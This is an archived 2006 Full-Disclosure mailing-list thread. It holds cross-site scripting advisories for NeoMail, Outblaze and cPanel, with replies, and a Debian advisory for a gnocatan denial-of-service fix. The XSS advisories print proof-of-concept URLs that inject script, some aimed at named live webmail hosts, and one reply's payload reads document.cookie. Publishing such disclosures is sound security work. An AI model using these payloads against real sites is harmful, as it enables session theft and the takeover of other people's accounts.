Discovered: 24 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org
Service: Webmail Perl Client
Vendor: neomail / www.neocodesolutions.com
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
Severity: Medium/High
Details:
NeoMail is a free open-source perl web-based e-mail client that can be
installed on any UNIX mail server that is also running a web server. With
thousands of installations worldwide, neomail has many features like
Sending/receiving messages with multiple attachments, inline image
attachment display Friendly, attractive, icon-based user interface,
multiple language support, including English, Spanish, German, French,
Hungarian, Italian, Dutch, Polish, Portuguese, Norwegian, Romanian,
Russian, Slovak, and more can be added easily ... configurable limits on
outgoing attachment size, folder disk usage, addressbook size... users can
import their address book from Outlook Express or Netscape Mail in CSV
format and more. neomail.pl is prone to cross-site scripting attacks. This
problem is due to a failure in the script to properly sanitize
user-supplied input. input can be passed in variable $date
Impact:
an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified
neomail user in the context of the vulnerable website. resulting in the
theft of cookie-based authentication giving the
attacker full access to the victim's neomail email account as well as
other type of attacks.
Affected script with proof of concept exploit:
/neomail.pl?sessionid=-session-0.9565905sort=datescriptalert('vul')/scriptfolderaction=displayheadersfirstmessage=1
Examples:
http://www.vulnerable-site.com/neomail.pl?sessionid=-session-0.9565905sort=date;scriptalert('vul')/scriptfolder=action=displayheadersfirstmessage=1
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Outblaze Cross Site Scripting Vulnerability
Title: outblaze Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
Discovered: 23 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org
Service: Webmail manager
Vendor: outblaze / www.outblaze.com
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
Severity: Medium/High
Details:
With over 40 million mailboxes under Outblaze management, Outblaze
provided enhanced messaging services to telcos, service providers, VARs,
Carriers and Corporations on an outsoucing basis, The core product is an
advanced email system with several available ancillary services.
throw.main outblaze script is prone to cross-site scripting attacks.
This problem is due to a failure in the application to properly sanitize
user-supplied input. input can be passed in variable $file
Impact:
an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified outblaze user in the
context of the vulnerable website. resulting in the theft of cookie-based
authentication giving the attacker full access to the victim's email
account as well as other type of attacks.
Affected script with proof of concept exploit:
/scripts/common/throw.main?file=BODY%20ONLOAD=alert('vul')
Examples:
http://mymail.linuxmail.org/scripts/common/throw.main?file=BODY%20ONLOAD=alert('vul')
http://www.hackermail.com/scripts/common/throw.main?file=BODY%20ONLOAD=alert('vul')
http://mymail.operamail.com/scripts/common/throw.main?file=BODY%20ONLOAD=alert('vul')
http://mail01.mail.com/scripts/common/throw.main?file=BODY%20ONLOAD=alert('vul')
http://super.japan.com/scripts/common/throw.main?file=BODY%20ONLOAD=alert('vul')
screen capture:
http://www.morx.org/mailXSS.jpg
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] cPanel Multiple Cross Site Scripting Vulnerability
Title: cPanel Multiple Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
Discovered: 22 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org
Service: Web Hosting Manager
Vendor: cPanel
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
Severity: Medium/High
Details:
cPanel (control panel) is a graphical web-based management tool, designed
to make administration of web sites as easy as possible. cPanel handles
all aspects of website administration in an easy-to-use interface.
The software, which is proprietary, runs on a number of popular RPM-based
Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
accessed on ports 2082 and 2083 (for a SSL version). Authentication is
either via HTTP or web page login. cPanel is prone to cross-site scripting
attacks. This problem is due to a failure in the application to properly
sanitize user-supplied input
Impact:
an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified cPanel user in the context
of the website hosting the vulnerable cPanel version. resulting in the
theft of cookie-based authentication giving the attacker full access to
the victim's cPanel account as well as other type of attacks.
Affected scripts with proof of concept exploit:
http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=scriptalert('vul')/scriptdomain=
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=scriptalert('vul')/scriptdomain=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0;scriptalert('vul')/script
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006domain=xxxtarget=;scriptalert('vul')/script
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006domain=xxx;scriptalert('vul')/scripttarget=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006;scriptalert('vul')/scriptdomain=xxxtarget=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan;scriptalert('vul')/scriptyear=2006domain=xxxtarget=xxx
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] cPanel Multiple Cross Site Scripting Vulnerability
On 3/13/2004 I notified cPanel that they had major XSS issues in their backend... beyond what I was actually sending them or documenting, and they should fix them. They agreed.However, based on this, it doesn't look like they've done much in the two years since I posted:
http://www.cirt.net/advisories/cpanel_xss.shtmlOn 2/2/06,
[EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
Title: cPanel Multiple Cross Site ScriptingAuthor: Simo Ben youssef aka _6mO_HaCk simo_at_morx_orgAffected scripts with proof of concept exploit:
http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=scriptalert('vul')/scriptdomain=
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=scriptalert('vul')/scriptdomain=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0scriptalert('vul')/script
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006domain=xxxtarget=scriptalert('vul')/script
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006domain=xxxscriptalert('vul')/scripttarget=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006scriptalert('vul')/scriptdomain=xxxtarget=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janscriptalert('vul')/scriptyear=2006domain=xxxtarget=xxx--
http://www.cirt.net |http://www.osvdb.org/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 964-1] New gnocatan packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 964-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 3rd, 2006 http://www.debian.org/security/faq - -- Package: gnocatan Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2006-0467 BugTraq ID : 16429 Debian Bug : 350237 A problem has been discovered in gnocatan, the computer version of the settlers of Catan boardgame, that can lead the server an other clients to exit via an assert, and hence does not permit the execution of arbitrary code. The game has been renamed into Pioneers after the release of Debian sarge. For the old stable distribution (woody) this problem has been fixed in version 0.6.1-5woody3. For the stable distribution (sarge) this problem has been fixed in version 0.8.1.59-1sarge1. For the unstable distribution (sid) this problem has been fixed in version 0.9.49-1 of pioneers. We recommend that you upgrade your gnocatan and pioneers packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan_0.6.1-5woody3.dsc Size/MD5 checksum: 682 be4b8188f8a2a602922af5c863c0a0bf http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan_0.6.1-5woody3.diff.gz Size/MD5 checksum: 9387 2b917d4b0f655dbd19dcbdaa2d314274 http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan_0.6.1.orig.tar.gz Size/MD5 checksum: 625157 a156f3fe3a50fbf91e9857a9d012e588 Architecture independent components: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-data_0.6.1-5woody3_all.deb Size/MD5 checksum:22258 65de8b0cca29b0664b305eac72552c80 http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-help_0.6.1-5woody3_all.deb Size/MD5 checksum: 264206 daf0906a288a803723843e153c040850 Alpha architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_alpha.deb Size/MD5 checksum: 105258 6b8d93753ce52b310376dfbf2719496d http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_alpha.deb Size/MD5 checksum:92528 16d483841c95c99804798dad42723dc6 ARM architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_arm.deb Size/MD5 checksum:77834 03c5081d287dc68b6f11d06d596a4ea3 http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_arm.deb Size/MD5 checksum:68114 0cb3235a4193ccba28d6bd9a1f4745f3 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_i386.deb Size/MD5 checksum:75524 1d87da02eb4c1c936307af40ead41973 http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_i386.deb Size/MD5 checksum:67428 c1527b4e2068987a66d0bf78b1f587ba Intel IA-64 architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_ia64.deb Size/MD5 checksum: 131080 c8fa0a1b80535052dce07750140386a0 http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_ia64.deb Size/MD5 checksum: 118132 8648a35bb396d10177b1987562fc1049 HP Precision architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_hppa.deb Size/MD5 checksum:93190 ea860fd49a0e32372ef0877f3683630f http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_hppa.deb Size/MD5 checksum:85118 6ad381585d1a5c59d88dd1ab346156d4 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_m68k.deb Size/MD5 checksum:71222 caddd4095aded1a21a1e4d53e1368468 http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-server_0.6.1-5woody3_m68k.deb Size/MD5 checksum:63704 f3dcc0f8eb8da5e86cb5c4354a8125e7 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnocatan/gnocatan-client_0.6.1-5woody3_mips.deb Size/MD5 checksum:85960
[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability
An addition to your POC :)
http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Eageaction=change
Thanks
Sumit
On 2/3/06, Sullo [EMAIL PROTECTED] wrote:
On 3/13/2004 I notified cPanel that they had major XSS issues in their
backend... beyond what I was actually sending them or documenting, and they
should fix them. They agreed.
However, based on this, it doesn't look like they've done much in the two
years since I posted:
http://www.cirt.net/advisories/cpanel_xss.shtml
On 2/2/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
Title: cPanel Multiple Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
Affected scripts with proof of concept exploit:
http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
scriptalert('vul')/scriptdomain=
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
scriptalert('vul')/scriptdomain=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
scriptalert('vul')/script
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006domain=xxxtarget=
scriptalert('vul')/script
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006domain=xxx
scriptalert('vul')/scripttarget=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Janyear=2006
scriptalert('vul')/scriptdomain=xxxtarget=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
scriptalert('vul')/scriptyear=2006domain=xxxtarget=xxx
--
http://www.cirt.net | http://www.osvdb.org/
--
Sumit Siddharth
Information Security Analyst
NII Consulting
Web: www.nii.co.in
NII Security Advisories
http://www.nii.co.in/resources/advisories.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
